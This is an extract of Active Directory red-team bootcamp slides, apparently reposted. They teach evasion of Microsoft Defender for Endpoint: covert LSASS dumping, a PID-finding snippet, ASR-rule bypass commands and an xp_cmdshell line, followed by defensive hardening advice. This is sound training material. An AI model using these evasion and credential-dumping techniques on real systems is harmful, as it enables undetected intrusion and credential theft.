@@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')')

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 281
Edition Bootcamp

Join https://t.me/offenciveSec 281

Learning Objective 22
• Get a reverse shell on a SQL server in eurocorp forest by abusing
database links from dcorp-mssql.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 282
Edition Bootcamp

Join https://t.me/offenciveSec 282

Introduction to EDR

• Endpoint Detection and Response (EDRs) system protects individual devices

(endpoints) by continuously monitoring for and responding to security threats.

• It includes features for threat detection, incident response, investigation, and

forensics, making it a vital component of modern cybersecurity strategies.

• Most EDRs correlate activity to gain broader telemetry and improve on detections..
Even if all performed activity is undetected by an AV, EDRs can still correlate all
actions performed to identify attacker TTPs.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 283
Edition Bootcamp

Join https://t.me/offenciveSec
Introduction to EDR - MDE

• In this lab, we will be targeting the popular, high performing EDR by Microsoft -
Microsoft Defender for Endpoint (MDE).

• In addition to standard EDR capabilities, MDE collects and processes behavioral

signals from the OS and analyzes this using cloud security analytics.

• MDE also supports detections based on the following technologies:

– Attack Surface Reduction rules, Exploit protection, Network protection, Controlled Folder Access
and Device control.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 284
Edition Bootcamp

https://learn.microsoft.com/en-us/microsoft-365/security/defender-
endpoint/microsoft-defender-endpoint?view=o365-worldwide

Join https://t.me/offenciveSec
Introduction to EDR - MDE

• MDE is enabled on eu-sql in the lab.

• Visit the MDE dashboard https://security.microsoft.com and login with your student credentials to
view and correlate performed activity in the Incidents and Alerts tab.
• Student credentials are available in the lab portal - https://adlab.enterprisesecurity.io/

• Our objective is to remain undetected by AV and EDR on eu-sql to perform:

– SQL command execution through SQL Server links
– Tool transfer
– Credential extraction
– Data exfiltration
– Lateral movement / remote access

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 285
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump

• While performing LSASS credential dumping, direct interaction/extraction of data

from the LSASS process (Ex: Mimikatz sekurlsa::logonpasswords) is detected by
MDE.

• A more opsec friendly way is by performing a dump of the LSASS process in a covert
way and then exfiltrating it to later analyze offline.

• However, standard techniques to create LSASS dumps (Ex: taskmanager → create

dump file) are detected and blocked.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 286
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump

• Most tools create an LSASS dump by:

1. Gaining a handle to the LSASS process.
2. Creating a minidump using the MiniDumpWriteDump WinAPI function implemented in
dbghelp.dll / dbgcore.dll.
3. Writing the dump file on disk.

• These 3 actions are heavily monitored by EDRs and are usually detected and
blocked.

• To circumvent these detections, we can avoid using tools that implement the
MiniDumpWriteDump function and perform the LSASS dump in a different way.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 287
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom APIs

• MiniDumpDotNet (https://github.com/WhiteOakSecurity/MiniDumpDotNet) is a
tool that implements a custom rewritten reimplementation of the
MiniDumpWriteDump Windows API function.

• In this tool, the MiniDumpWriteDump function iss reversed, and a custom

implementation is implemented based on a Beacon Object File (BOF) adaption and
ReactOS source code.

Look at slide notes for References.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 288
Edition Bootcamp

MiniDumpDotNet Blog - https://www.whiteoaksecurity.com/blog/minidumpdotnet-

part-1/
NanoDump Github: https://github.com/helpsystems/nanodump
PostDump Github: https://github.com/YOLOP0wn/POSTDump
Custom MiniDumpWriteDump BOF Github:
https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump
ReactOS Source code for MiniDumpWriteDump implementation:
https://doxygen.reactos.org/d8/d5d/minidump_8c_source.html
MiniDumpWriteDump Windows API function: https://learn.microsoft.com/en-
us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom APIs

• MiniDumpDotNet provides .NET CLR injectable LSASS process dumping capability

along with CLR support (.NET runtime) to support execution through standalone
binary, assembly.load(), PowerShell and JScript/VBS.

• This tool can also be used to dump any. For example: Dumping processes like
Outlook in may result in cleartext credentials.

• Dump the LSASS process with minidumpdotnet using the following syntax. Note that
we need Process ID of LSASS process:
.\minidumpdotnet.exe <LSASS PID> <minidump file>

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 289
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom APIs -
MiniDumpDotnet Setup

• Clone/Download the project:

git clone https://github.com/WhiteOakSecurity/MiniDumpDotNet.git
Note: This project was implemented with Visual Studio 2015, but should be supported by any Visual Studio
compiler that can build VS C++ CLR code.

• Building the solution will generate both a binary executable, as well as a .NET class
library.

• Build the project: Build -> Build Solution

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 290
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom APIs -
MiniDumpDotnet AV Signatures

• Checking for any detections by Windows using DefenderCheck

C:\AD\Tools\DefenderCheck> .\DefenderCheck.exe C:\AD\Tools\minidumpdotnet.exe
[+] No threat found in submitted file!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 291
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom
APIs
• No detections by MDE!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 292
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom APIs -
Find LSASS PID

• Using commands like tasklist /v to enumerate the LSASS PID is detected

by MDE.

• To avoid this, we can make use of standard WINAPIs to find the LSASS
PID which opsec safe.

• In case of RDP access, tools like Task Manager (or other less suspicious
alternatives) could also be used for finding LSASS PID.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 293
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom APIs -
Find LSASS PID

• Here is a code snippet of a custom function called FindPID in C++ to dynamically

enumerate the LSASS PID:
// Find PID of a process by name
int FindPID(const char* procname)
{
int pid = 0;
PROCESSENTRY32 proc = {};
proc.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); bool bProc = Process32First(snapshot, &proc);
while (bProc)
{
if (strcmp(procname, proc.szExeFile) == 0)
{
pid = proc.th32ProcessID;
break;
}
bProc = Process32Next(snapshot, &proc);
}
return pid;
}
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 294
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom APIs -
Find LSASS PID

• If the FindPID function is added to MiniDumpDotnet tool, there is a

detection by MDE

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 295
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Credential Extraction – LSASS Dump using Custom APIs -
Find LSASS PID

• Using the FindPID code in a standalone executable is not detected by Defender AV

or MDE. Let’s call it FindLSASSPID.exe.
C:\AD\Tools\DefenderCheck> .\DefenderCheck.exe C:\AD\Tools\FindLSASSPID.exe
[+] No threat found in submitted file!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 296
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Tools Transfer and Execution

• Now that we have a couple of executables, let’s transfer them to the target.

• Downloading tools over HTTP(S) can be risky as it does increase the risk score and
chances of detection by the EDR.

• However, if binaries that are intended for downloads such as Edge (msedge.exe) are
available on the target we can perform HTTP(S) downloads without any detections.

• Another opsec friendly way would be to share files over SMB. Execution can be
directly performed from a readable share and is less risky than standard download
and execute actions.
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 297
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Breaking Detection Chains

• In our experience, most EDRs correlate activity in a specific time interval

after which it is reset, this varies for each EDR.

• To bypass these correlation-based detections we can:

– Attempt to wait for a small-time interval (~10 mins) before
performing the next query.
– Append non-suspicious queries in between subsequent suspicious
ones to break the detection chains.

• We will run simple SQL queries on the eu-sql server.

Attacking and Defending Active Directory - Beginner's
AlteredSecurity 298
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Lateral Movement - ASR Rules

• MDE correlates detections heavily around Attack Surface Reduction

(ASR) rules.

• ASR rules are configurations that can be applied and customized to

reduce the attack surface of a machine. These rules can be customized
and referenced with their unique GUIDs.

• ASR rules are written in .lua and can be reversed and extracted from a
specific target Windows machine.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 299
Edition Bootcamp

Microsoft ASR rules: https://learn.microsoft.com/en-us/microsoft-

365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide
Gist of ASR rules: https://learn.microsoft.com/en-us/microsoft-
365/security/defender-endpoint/attack-surface-reduction-rules-
reference?view=o365-worldwide#attack-surface-reduction-rules-by-type

Join https://t.me/offenciveSec
MDE - Lateral Movement - ASR Rules Bypass

• ASR rules are easy to understand. For example, the GetMonitoredLocations function displays
processes that are monitored and remote execution using them will result in a detection. [Check the
slide notes]

• OS trusted methods like WMI and Psremoting or administrative tools like PSExec are detected by
MDE.

• To avoid detections based on a specific ASR rule such as the "Block process creations originating from
PSExec and WMI commands" rule:
– We can use alternatives such as winrm access (winrs) instead of PSExec/WMI execution (This is undetected by MDE but
detected by MDI)
– Use the GetCommandLineExclusions function which displays a list of command line exclusions (Ex:
".:\\windows\\ccm\\systemtemp\\.+“ ), if included in the command line will result in bypassing this rule and detection.
C:\AD\Tools\WSManWinRM.exe eu-sql.eu.eurocorp.local "cmd /c notepad.exe C:\Windows\ccm\systemtemp\"

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 300
Edition Bootcamp

"Block process creations originating from PSExec and WMI commands“ ASR rule
reversed:
https://github.com/HackingLZ/ExtractedDefender/blob/main/asr/d1e49aac-8f56-
4280-b9ba-993a6d77406c

Join https://t.me/offenciveSec
MDE - Lateral Movement – Process Detection

• Once we have remote access to a machine, we can use commands like

whoami.exe for initial enumeration.

• Since whoami.exe is unlikely to be used under a process like

sqlservr.exe, a detection is likely to happen.

• A more opsec friendly way is by using alternatives such as SET

USERNAME which performs the same functionality as whoami.exe to
enumerate the current username using environment variables.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 301
Edition Bootcamp

Join https://t.me/offenciveSec
MDE - Lateral Movement – Process Detection

• An example of a detection of whoami.exe spawned under sqlservr.exe is shown

below:

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 302
Edition Bootcamp

Join https://t.me/offenciveSec
Learning Objective 23
• Compromise eu-sqlx again. Use opsec friendly alternatives to bypass
MDE and MDI.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 303
Edition Bootcamp

Join https://t.me/offenciveSec 303

Attack Paths

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 304
Edition Bootcamp

Join https://t.me/offenciveSec 304

Detection and Defense
• Protect and Limit Domain Admins
• Isolate administrative workstations
• Secure local administrators
• Time bound and just enough administration
• Isolate administrators in a separate forest and breach containment using
Tiers and ESAE

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 305
Edition Bootcamp

Join https://t.me/offenciveSec 305

Protect and Limit Domain Admins
• Reduce the number of Domain Admins in your environment.
• Do not allow or limit login of DAs to any other machine other than the
Domain Controllers.
• Never run a service with a DA. Credential theft protections which we are
going to discuss soon are rendered useless in case of a service account.
• Set "Account is sensitive and cannot be delegated" for DAs.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 306
Edition Bootcamp

Join https://t.me/offenciveSec 306

Protect and Limit Domain Admins
Protected Users Group
• Protected Users is a group introduced in Server 2012 R2 for "better protection against
credential theft" by not caching credentials in insecure ways. A user added to this group has
following major device protections:
– Cannot use CredSSP and WDigest - No more cleartext credentials caching.
– NTLM hash is not cached.
– Kerberos does not use DES or RC4 keys. No caching of clear text cred or long term keys.
• If the domain functional level is Server 2012 R2, following DC protections are available:
– No NTLM authentication.
– No DES or RC4 keys in Kerberos pre-auth.
– No delegation (constrained or unconstrained)
– No renewal of TGT beyond initial four hour lifetime - Hardcoded, unconfigurable
"Maximum lifetime for user ticket" and "Maximum lifetime for user ticket renewal"

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 307
Edition Bootcamp

https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-
and-management/protected-users-security-group
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/how-to-
configure-protected-accounts#BKMK_AddtoProtectedUsers

Join https://t.me/offenciveSec 307

Protect and Limit Domain Admins
Protected Users Group
• Needs all domain control to be at least Server 2008 or later (because
AES keys).
• Not recommended by MS to add DAs and EAs to this group without
testing "the potential impact" of lock out.
• No cached logon ie.e no offline sign-on.
• Having computer and service accounts in this group is useless as their
credentials will always be present on the host machine.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 308
Edition Bootcamp

Join https://t.me/offenciveSec 308

Isolate administrative workstations
Privileged Administrative Workstations (PAWs)
• A hardened workstation for performing sensitive tasks like
administration of domain controllers, cloud infrastructure, sensitive
business functions etc.
• Can provides protection from phishing attacks, OS vulnerabilities,
credential replay attacks.
• Admin Jump servers to be accessed only from a PAW, multiple strategies
– Separate privilege and hardware for administrative and normal tasks.
– Having a VM on a PAW for user tasks.
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 309
Edition Bootcamp

Join https://t.me/offenciveSec 309

https://learn.microsoft.com/en-us/previous-versions/mt227395(v=msdn.10)

Join https://t.me/offenciveSec
Time Bound Administration - JIT
• Just In Time (JIT) administration provides the ability to grant time-bound
administrative access on per-request bases.
• Check out Temporary Group Membership! (Requires Privileged Access
Management Feature to be enabled which can't be turned off later)
Add-ADGroupMember -Identity 'Domain Admins' -Members
newDA -MemberTimeToLive (New-TimeSpan -Minutes 60)

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 311
Edition Bootcamp

Join https://t.me/offenciveSec 311

Time Bound Administration - JEA
• JEA (Just Enough Administration) provides role based access control for
PowerShell based remote delegated administration.
• With JEA non-admin users can connect remotely to machines for doing
specific administrative tasks.
• For example, we can control the command a user can run and even
restrict parameters which can be used.
• JEA endpoints have PowerShell transcription and logging enabled.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 312
Edition Bootcamp

Join https://t.me/offenciveSec 312

Detection and Defense - ESAE
ESAE (Enhanced Security Admin Environment)
• Dedicated administrative forest for managing critical assets like administrative
users, groups and computers.
• Since a forest is considered a security boundary rather than a domain, this
model provides enhanced security controls.
• The administrative forest is also called the Red Forest.
• Administrative users in a production forest are used as standard non-
privileged users in the administrative forest.
• Selective Authentication to the Red Forest enables stricter security controls
on logon of users from non-administrative forests.
• Microsoft retired ESAE in 2021 and replaced it with Privileged Access Strategy
but it is still worth discussing.
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 313
Edition Bootcamp

https://learn.microsoft.com/en-us/security/compass/esae-retirement
https://learn.microsoft.com/en-us/security/compass/privileged-access-strategy

Join https://t.me/offenciveSec 313

ESAE

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 314
Edition Bootcamp

Join https://t.me/offenciveSec 314

Detection and Defense - Privileged Access Strategy
• Privileged access strategy is Microsoft's guidance for securing an
enterprise.
• ".. a broader strategy to move towards a Zero Trust architecture"
• Zero Trust - Verify explicitly, Use least privilege access and Assume
breach.
• Privileged access strategy includes and focuses on using Azure services.
"Cloud is a source of security"
• Includes Rapid Modernization Plan (RAMP) to adapt recommendations.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 315
Edition Bootcamp

https://learn.microsoft.com/en-us/security/privileged-access-
workstations/privileged-access-strategy
https://learn.microsoft.com/en-us/security/privileged-access-workstations/security-
rapid-modernization-plan

Join https://t.me/offenciveSec 315

Detection and Defense - Privileged Access Strategy

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 316
Edition Bootcamp

Image Source - https://learn.microsoft.com/en-us/security/privileged-access-

workstations/privileged-access-strategy

Join https://t.me/offenciveSec 316

Detection and Defense - Enterprise Access Model
• This replaces the Tier model discussed earlier. This model uses different
planes:
• Control Plane
– Addresses access control. Identity is the primary control.
– Other access controls include network, applications and data.
• Management plane - To manage and monitor assets
• Data/Workload Plane - Assets with business value like applications, data,
workload, IP etc.
• User access - Employee access, public access, B2B etc.
• App access - API access

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 317
Edition Bootcamp

https://learn.microsoft.com/en-us/security/privileged-access-
workstations/privileged-access-access-model

Join https://t.me/offenciveSec 317

Detection and Defense - Enterprise Access Model

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 318
Edition Bootcamp

Image source - https://learn.microsoft.com/en-us/security/privileged-access-

workstations/privileged-access-access-model

Join https://t.me/offenciveSec 318

Detection and Defense - Credential Guard
• It "uses virtualization-based security to isolate secrets so that only
privileges system software can access them".
• Effective in stopping PTH and Over-PTH attacks by restricting access to
NTLM hashes and TGTs. It is not possible to write Kerberos tickets to
memory even if we have credentials.
https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 319
Edition Bootcamp

https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Defeating%20Pass-
the-Hash-Separation-Of-Powers-wp.pdf

Join https://t.me/offenciveSec 319

Detection and Defense - Credential Guard
• But, credentials for local accounts in SAM and Service account
credentials from LSA Secrets are NOT protected.
• Credential Guard cannot be enabled on a domain controller as it breaks
authentication there.
• Only available on the Windows 10 and later Enterprise edition and
Server 2016/later.
• There are bypasses but still very effective.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 320
Edition Bootcamp

Join https://t.me/offenciveSec 320

Detection and Defense - Device Guard (WDAC)
• It is a group of features "designed to harden a system against malware attacks. Its
focus is preventing malicious code from running by ensuring only known good code
can run."
• Three primary components:
– Configurable Code Integrity (CCI) - Configure only trusted code to run
– Virtual Secure Mode Protected Code Integirty - Enforces CCI with Kernerl Mode (KMCI) and User
Mode (UMCI)
– Platform and UEFI Secure Boot - Ensures boot binaries and firmware integrity
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/introduction-to-
device-guard-virtualization-based-security-and-windows-defender-application-control

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 321
Edition Bootcamp

Join https://t.me/offenciveSec 321

Join https://t.me/offenciveSec
https://learn.microsoft.com/en-us/defender-for-identity/
https://learn.microsoft.com/en-us/defender-for-identity/understanding-security-
alerts

Join https://t.me/offenciveSec
https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-
for-ActiveDirectory-Domination.pdf

Join https://t.me/offenciveSec
Detection and Defense - Ticket Forging and Replay
• For all the attacks that include Forging or Replaying Kerberos tickets, the
easiest detection is - Access to a privileged or higher tier asset from a
lower tier.

• Applies on Golden, Silver, Diamond tickets and a lot of other attacks!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 325
Edition Bootcamp

Join https://t.me/offenciveSec 325

https://learn.microsoft.com/en-us/windows-server/security/group-managed-service-
accounts/group-managed-service-accounts-overview

Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Detection and Defense - Deception
• Deception is a very effective technique in active directory defense.
• By using decoy domain objects, defenders can trick adversaries to follow
a particular attack path which increases chances of detection and
increase their cost in terms of time.
• Traditionally, deception has been limited to leave honey credentials on
some boxes and check their usage but we can use it effectively during
other phases of an attack.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 328
Edition Bootcamp

Join https://t.me/offenciveSec 328

Detection and Defense - Deception
• What to target? Adversary mindset of going for the "lowest hanging fruit" and
illusive superiority over defenders.
• We must provide the adversaries what they are looking for. For example, what
adversaries look for in a user object:
– A user with high privileges.
– Permissions over other objects.
– Poorly configured ACLs.
– Misconfigured/dangerous user attributes and so on.
• Let's create some user objects which can be used for deceiving adversaries. We can
use Deploy-Deception for this: https://github.com/samratashok/Deploy-Deception
• Note that Windows Settings|Security Settings|Advanced Audit Policy
Configuration|DS Access|Audit Directory Service Access Group Policy needs to be
configured to enable 4662 logging.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 329
Edition Bootcamp

Join https://t.me/offenciveSec 329

Detection and Defense - User Deception
• Creates a decoy user whose password never expires and a 4662 is
logged whenever x500uniqueIdentifier - d07da11f-8a3d-42b6-b0aa-
76c962be719a property of the user is read.:
Create-DecoyUser -UserFirstName user -UserLastName
manager -Password Pass@123 | Deploy-UserDeception -
UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-
b0aa-76c962be719a -Verbose

• This property is not read by net.exe, WMI classes (like

Win32_UserAccount) and ActiveDirectory module. But LDAP based tools
like PowerView and ADExplorer trigger the logging.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 330
Edition Bootcamp

Join https://t.me/offenciveSec 330

Thank you
• Please provide feedback.
• Follow me @nikhil_mitt
• [email protected]
• For other red team labs: https://www.alteredsecurity.com/online-labs
• For bootcamps: https://www.alteredsecurity.com/bootcamps
• For lab extension/access/support, please contact :
[email protected]
• Discord (Claim crtp-enrolled role to access the dedicated channel) -
https://discord.com/invite/vcEwaRMwJe
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 331
Edition Bootcamp

Join https://t.me/offenciveSec 331

1.1 Active Directory Exploitation and Lateral – BlackBox Approach
No ratings yet
1.1 Active Directory Exploitation and Lateral – BlackBox Approach
322 pages
LabManual_Sliver
No ratings yet
LabManual_Sliver
224 pages
INE Active Directory Penetration Testing Course File
No ratings yet
INE Active Directory Penetration Testing Course File
107 pages
Windows Server 2003 Domains Active Directory
No ratings yet
Windows Server 2003 Domains Active Directory
392 pages
AD Advanced Notes
No ratings yet
AD Advanced Notes
405 pages
Offensive Active Directory 101 PDF
No ratings yet
Offensive Active Directory 101 PDF
84 pages
Attacking and Defending Active Directory - Lab Manual
100% (2)
Attacking and Defending Active Directory - Lab Manual
125 pages
LabManualV1 4
No ratings yet
LabManualV1 4
136 pages
LabManual_Sliver
No ratings yet
LabManual_Sliver
241 pages
Active Directory Enumeration & Attacks
No ratings yet
Active Directory Enumeration & Attacks
368 pages
IStar UserManual English
No ratings yet
IStar UserManual English
18 pages
Com - Cherisher.beauty - Camera.videocall Logcat
No ratings yet
Com - Cherisher.beauty - Camera.videocall Logcat
112 pages
LabManual_Sliver
No ratings yet
LabManual_Sliver
232 pages
How To Install Tems Discovery On Window 7
50% (2)
How To Install Tems Discovery On Window 7
1 page
Beamng Dxdiag
No ratings yet
Beamng Dxdiag
50 pages
IT Essentials - Certificate
No ratings yet
IT Essentials - Certificate
1 page
LabManualV1.5
No ratings yet
LabManualV1.5
121 pages
Step-by-Step Guide AnyDesk
100% (1)
Step-by-Step Guide AnyDesk
3 pages
Log
No ratings yet
Log
116 pages
03. Active Directory PowerView
No ratings yet
03. Active Directory PowerView
58 pages
Tasks
No ratings yet
Tasks
127 pages
Active Directory Attacks-Steps Types and Signature
No ratings yet
Active Directory Attacks-Steps Types and Signature
23 pages
DEFCON 26 Workshop Adam Steed and James Albany Attacking Active Directory and Advanced ( PDFDrive )
No ratings yet
DEFCON 26 Workshop Adam Steed and James Albany Attacking Active Directory and Advanced ( PDFDrive )
107 pages
Active Directory Mastering
No ratings yet
Active Directory Mastering
53 pages
T2199A_01
No ratings yet
T2199A_01
32 pages
AIX Manual Threads
No ratings yet
AIX Manual Threads
16 pages
Active Directory PowerView
No ratings yet
Active Directory PowerView
58 pages
Logcat 1592360150178
No ratings yet
Logcat 1592360150178
16 pages
cFosSpeed Setup Log
No ratings yet
cFosSpeed Setup Log
8 pages
Navigating the OneNote Audio Chaos
No ratings yet
Navigating the OneNote Audio Chaos
3 pages
Active Directory Penetration Testing Training Online
No ratings yet
Active Directory Penetration Testing Training Online
10 pages
Crash 2024 04 23 - 18.35.25 Client
No ratings yet
Crash 2024 04 23 - 18.35.25 Client
10 pages
Installing Ringo For Arduino PDF
No ratings yet
Installing Ringo For Arduino PDF
10 pages
2024-06-11 Biz Main
No ratings yet
2024-06-11 Biz Main
28 pages
Lab 1
No ratings yet
Lab 1
6 pages
Active Directory Attacks-Steps, Types, and Signatures: Electronics August 2022
No ratings yet
Active Directory Attacks-Steps, Types, and Signatures: Electronics August 2022
24 pages
Cert Ro Active Directory Kill Chain Attack Defense Toolkit v2021
No ratings yet
Cert Ro Active Directory Kill Chain Attack Defense Toolkit v2021
11 pages
Masterclass AADA 2020v1.2
No ratings yet
Masterclass AADA 2020v1.2
5 pages
HDClone X.3 Product News - en
No ratings yet
HDClone X.3 Product News - en
3 pages
2. Active Directory LDAP
No ratings yet
2. Active Directory LDAP
76 pages
How To Minimize Your Active Directory Attack Surface
No ratings yet
How To Minimize Your Active Directory Attack Surface
5 pages
ad
No ratings yet
ad
5 pages
NFSW
No ratings yet
NFSW
3 pages
Using Powershell For Active Directory
No ratings yet
Using Powershell For Active Directory
17 pages
Active Directory Pentest Course
No ratings yet
Active Directory Pentest Course
10 pages
Jenkins Installation Steps On AWS EC2
No ratings yet
Jenkins Installation Steps On AWS EC2
4 pages
Journal 0350
No ratings yet
Journal 0350
19 pages
Active Directory 101 - A Step-by-Step Tutorial For Beginners - Server Academy
No ratings yet
Active Directory 101 - A Step-by-Step Tutorial For Beginners - Server Academy
9 pages
BootCamp Attacking and Defending Active Directory Beginner's Edition Syllabus
No ratings yet
BootCamp Attacking and Defending Active Directory Beginner's Edition Syllabus
2 pages
Administering Active Directory® Securely and Efficiently
No ratings yet
Administering Active Directory® Securely and Efficiently
36 pages
Crash Report
No ratings yet
Crash Report
7 pages
How To Secure Active Directory
100% (1)
How To Secure Active Directory
33 pages
LabManual Sliver
No ratings yet
LabManual Sliver
214 pages
Active Directory
No ratings yet
Active Directory
3 pages
@FsKnockouT-1. Active Directory Enumeration & Attacks
No ratings yet
@FsKnockouT-1. Active Directory Enumeration & Attacks
368 pages
Case FBD - Premier Pas
No ratings yet
Case FBD - Premier Pas
180 pages
Us 16 Metcalf Beyond The MCSE Active Directory For The Security Professional WP
No ratings yet
Us 16 Metcalf Beyond The MCSE Active Directory For The Security Professional WP
50 pages
02. Active Directory LDAP
No ratings yet
02. Active Directory LDAP
76 pages
AD Penetration Testing + Red Team Tactics
100% (1)
AD Penetration Testing + Red Team Tactics
10 pages
6425C 02
No ratings yet
6425C 02
36 pages
Active Directory Security Guide
100% (1)
Active Directory Security Guide
53 pages
Active Directory Pentest Course 1705144142
No ratings yet
Active Directory Pentest Course 1705144142
10 pages
Active Directory PowerView
No ratings yet
Active Directory PowerView
58 pages
MM3100 Update 2.18 Readme
No ratings yet
MM3100 Update 2.18 Readme
4 pages
คู่มือเครื่องแสกนหน้า ND-20-PF
No ratings yet
คู่มือเครื่องแสกนหน้า ND-20-PF
45 pages
AD OffensiveActiveDirectory 101 MichaelRitter
No ratings yet
AD OffensiveActiveDirectory 101 MichaelRitter
84 pages
Attacking Active Directory Tools and Techniques For Using Your
No ratings yet
Attacking Active Directory Tools and Techniques For Using Your
3 pages
How To Setup Windows XP From USB Drive
No ratings yet
How To Setup Windows XP From USB Drive
3 pages
HP Spectre Folio Convertible HP Spectre x360 Convertible HP ENVY 13 Laptop
No ratings yet
HP Spectre Folio Convertible HP Spectre x360 Convertible HP ENVY 13 Laptop
2 pages
Active Directory Penetration Testing Training Online 1679836929
No ratings yet
Active Directory Penetration Testing Training Online 1679836929
10 pages
AD Attack
No ratings yet
AD Attack
28 pages
Installing SATA Drivers Without A Floppy Disk
No ratings yet
Installing SATA Drivers Without A Floppy Disk
4 pages
General Emilio Aguinalado National Highschool: PC Assembly/Disassembly With Software Installation
100% (2)
General Emilio Aguinalado National Highschool: PC Assembly/Disassembly With Software Installation
2 pages
Midi Smart Plus
